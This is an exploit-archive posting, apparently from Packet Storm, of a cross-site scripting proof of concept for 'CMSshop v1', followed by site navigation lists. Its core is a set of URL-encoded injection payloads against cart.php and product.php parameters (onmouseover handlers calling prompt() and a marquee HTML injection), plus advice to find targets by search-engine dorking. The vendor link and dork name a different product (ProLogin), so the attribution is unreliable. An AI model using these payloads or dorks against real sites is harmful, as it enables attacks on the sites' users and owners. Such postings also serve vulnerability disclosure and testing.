Headline
CMSshop 1 Cross Site Scripting
CMSshop version 1 suffers from a cross site scripting vulnerability.
CMSshop 1 Cross Site Scripting
Posted Jul 31, 2023
Authored by indoushka
CMSshop version 1 suffers from a cross site scripting vulnerability.
tags | exploit, xss
SHA-256 | 987e4a7e0d2984ae1bf6c18eb68c0343d8d4d8903869ab00d311e71710917c70
Download | Favorite | View
CMSshop 1 Cross Site Scripting
====================================================================================================================================| # Title : CMSshop(ir) v1 XSS Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) || # Vendor : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169 || # Dork : "Login - ProLogin" |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /shop-php/cart.php?new=28%22%20onmouseover%3dprompt(904251)%20bad%3d%22 /shop-php/product.php?productid=20&start=0%22%20onmouseover%3dprompt(961299)%20bad%3d%22 [+] http://localhost/shop-php/cart.php?new=21%22%20%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================
File Tags
- ActiveX (932)
- Advisory (81,806)
- Arbitrary (16,170)
- BBS (2,859)
- Bypass (1,736)
- CGI (1,026)
- Code Execution (7,254)
- Conference (679)
- Cracker (841)
- CSRF (3,336)
- DoS (23,386)
- Encryption (2,366)
- Exploit (51,705)
- File Inclusion (4,218)
- File Upload (969)
- Firewall (821)
- Info Disclosure (2,759)
- Intrusion Detection (891)
- Java (3,038)
- JavaScript (853)
- Kernel (6,658)
- Local (14,445)
- Magazine (586)
- Overflow (12,666)
- Perl (1,423)
- PHP (5,141)
- Proof of Concept (2,338)
- Protocol (3,587)
- Python (1,531)
- Remote (30,698)
- Root (3,578)
- Rootkit (508)
- Ruby (612)
- Scanner (1,638)
- Security Tool (7,879)
- Shell (3,177)
- Shellcode (1,213)
- Sniffer (894)
- Spoof (2,197)
- SQL Injection (16,329)
- TCP (2,399)
- Trojan (687)
- UDP (886)
- Virus (664)
- Vulnerability (31,731)
- Web (9,628)
- Whitepaper (3,748)
- x86 (962)
- XSS (17,889)
- Other
File Archives
- July 2023
- June 2023
- May 2023
- April 2023
- March 2023
- February 2023
- January 2023
- December 2022
- November 2022
- October 2022
- September 2022
- August 2022
- Older
Systems
- AIX (428)
- Apple (2,002)
- BSD (373)
- CentOS (57)
- Cisco (1,922)
- Debian (6,800)
- Fedora (1,691)
- FreeBSD (1,244)
- Gentoo (4,322)
- HPUX (879)
- iOS (351)
- iPhone (108)
- IRIX (220)
- Juniper (67)
- Linux (46,301)
- Mac OS X (685)
- Mandriva (3,105)
- NetBSD (256)
- OpenBSD (484)
- RedHat (13,624)
- Slackware (941)
- Solaris (1,610)
- SUSE (1,444)
- Ubuntu (8,782)
- UNIX (9,272)
- UnixWare (186)
- Windows (6,566)
- Other